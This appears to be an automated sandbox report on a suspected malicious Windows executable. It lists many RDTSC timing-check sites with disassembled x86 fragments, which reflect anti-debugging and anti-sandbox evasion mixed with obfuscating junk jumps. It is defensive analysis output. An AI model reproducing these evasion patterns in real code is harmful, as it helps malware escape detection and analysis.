                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 415FCE second address: 415FD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 415FD3 second address: 416000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007FE311181216h 0x0000000c jp 00007FE311181216h 0x00000012 jmp 00007FE311181223h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 416000 second address: 416006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3E5609 second address: 3E560D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 413E6E second address: 413E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 413E74 second address: 413E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414137 second address: 414173 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE310CDC3A2h 0x00000008 jnp 00007FE310CDC396h 0x0000000e jo 00007FE310CDC396h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007FE310CDC39Ch 0x0000001e jnp 00007FE310CDC3A8h 0x00000024 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 4142AD second address: 4142B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE311181216h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 41440F second address: 41444F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FE310CDC3A3h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FE310CDC396h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 41444F second address: 414453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414453 second address: 414457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 41457F second address: 414589 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE311181216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414589 second address: 4145A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE310CDC398h 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jng 00007FE310CDC3A2h 0x00000016 jnl 00007FE310CDC396h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 4146EA second address: 4146F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 4146F0 second address: 414717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE310CDC39Fh 0x0000000b jg 00007FE310CDC396h 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007FE310CDC398h 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414717 second address: 41471C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414B12 second address: 414B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A5h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414B30 second address: 414B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414B36 second address: 414B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414E0B second address: 414E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE311181216h 0x0000000a je 00007FE31118121Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 414E1D second address: 414E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 40BC17 second address: 40BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 40BC21 second address: 40BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FE310CDC3AEh 0x0000000b jmp 00007FE310CDC3A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 40BC40 second address: 40BC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 4150C9 second address: 4150CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4150CF second address: 4150EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE311181224h 0x0000000b popad 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4159F6 second address: 4159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4159FC second address: 415A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415B20 second address: 415B57 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE310CDC396h 0x00000008 jnc 00007FE310CDC396h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jnl 00007FE310CDC396h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e jmp 00007FE310CDC3A9h 0x00000023 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415E36 second address: 415E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415E3C second address: 415E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FE310CDC396h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE310CDC3A6h 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4176F6 second address: 417702 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE311181216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 417702 second address: 41770A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41770A second address: 41770E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41770E second address: 417712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E204A second address: 3E2068 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE31118121Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE31118121Bh 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E2068 second address: 3E2084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE310CDC3A6h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419CFC second address: 419D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D00 second address: 419D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D04 second address: 419D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE311181218h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D16 second address: 419D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC39Fh 0x00000008 jmp 00007FE310CDC3A3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jns 00007FE310CDC3AFh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FE310CDC39Ah 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 419D76 second address: 419D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE311181216h 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41B04A second address: 41B05E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE310CDC396h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jne 00007FE310CDC396h 0x00000013 pop edi 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E7046 second address: 3E704A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E704A second address: 3E7050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E8B3D second address: 3E8B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181228h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4211BF second address: 4211C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42134C second address: 421352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421352 second address: 421388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC39Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE310CDC3A2h 0x00000010 jmp 00007FE310CDC39Fh 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421388 second address: 4213A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4213A4 second address: 4213AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42154C second address: 421552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42186F second address: 421873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 421873 second address: 421879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4251B0 second address: 4251B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4251B5 second address: 4251E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE311181222h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FE311181220h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 425E91 second address: 425E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 425F68 second address: 425F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 427BE7 second address: 427BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4299D0 second address: 4299D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD46 second address: 42AD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD4F second address: 42AD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD53 second address: 42AD79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and edi, dword ptr [ebp+122D2AC7h] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D30BCh], ebx 0x00000016 push 00000000h 0x00000018 mov si, D02Eh 0x0000001c xchg eax, ebx 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007FE310CDC396h 0x00000026 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42AD79 second address: 42ADAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FE311181223h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B867 second address: 42B86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B86B second address: 42B875 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EBFAB second address: 3EBFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EBFAF second address: 3EBFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42E9DE second address: 42E9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42E9E3 second address: 42E9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42B5FE second address: 42B604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42F8B6 second address: 42F92D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE31118121Ch 0x00000008 jbe 00007FE311181216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, dword ptr [ebp+12451AB0h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FE311181218h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov ebx, 6AF40462h 0x0000003a mov edi, dword ptr [ebp+12458628h] 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+124535A5h], ecx 0x00000048 jmp 00007FE31118121Ch 0x0000004d xchg eax, esi 0x0000004e push edi 0x0000004f push ebx 0x00000050 je 00007FE311181216h 0x00000056 pop ebx 0x00000057 pop edi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FE311181223h 0x00000060 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431ACA second address: 431B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FE310CDC398h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FE310CDC39Ch 0x00000019 jbe 00007FE310CDC3A9h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EB39 second address: 42EBD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, 084BA39Bh 0x0000000f jo 00007FE31118121Ch 0x00000015 or ebx, dword ptr [ebp+12478C00h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007FE311181218h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D1C27h], edx 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007FE311181218h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 mov ebx, eax 0x00000065 mov eax, dword ptr [ebp+122D0741h] 0x0000006b mov bh, 73h 0x0000006d push FFFFFFFFh 0x0000006f mov edi, 7B82CC54h 0x00000074 mov ebx, ecx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FE31118121Fh 0x00000080 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431B03 second address: 431B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC39Dh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBD0 second address: 42EBDA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 431B14 second address: 431B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A6h 0x00000008 ja 00007FE310CDC396h 0x0000000e jc 00007FE310CDC396h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FE310CDC39Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBDA second address: 42EBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42FA7E second address: 42FAEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 and bx, 860Bh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+124551CAh], ebx 0x00000019 mov edi, dword ptr [ebp+122D3AF5h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push edi 0x00000027 jmp 00007FE310CDC3A6h 0x0000002c pop edi 0x0000002d mov eax, dword ptr [ebp+122D0081h] 0x00000033 mov ebx, dword ptr [ebp+122D5A96h] 0x00000039 mov dword ptr [ebp+122D29C8h], ebx 0x0000003f push FFFFFFFFh 0x00000041 nop 0x00000042 push ebx 0x00000043 push edx 0x00000044 jmp 00007FE310CDC3A2h 0x00000049 pop edx 0x0000004a pop ebx 0x0000004b push eax 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42EBE0 second address: 42EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42FAEC second address: 42FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A6h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE310CDC39Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4322E7 second address: 4322EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433109 second address: 43314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FE310CDC39Ch 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D3848h], edx 0x00000013 jbe 00007FE310CDC396h 0x00000019 push 00000000h 0x0000001b mov di, B505h 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D2DE5h], eax 0x00000027 xchg eax, esi 0x00000028 jmp 00007FE310CDC39Ah 0x0000002d push eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FE310CDC396h 0x00000037 rdtsc
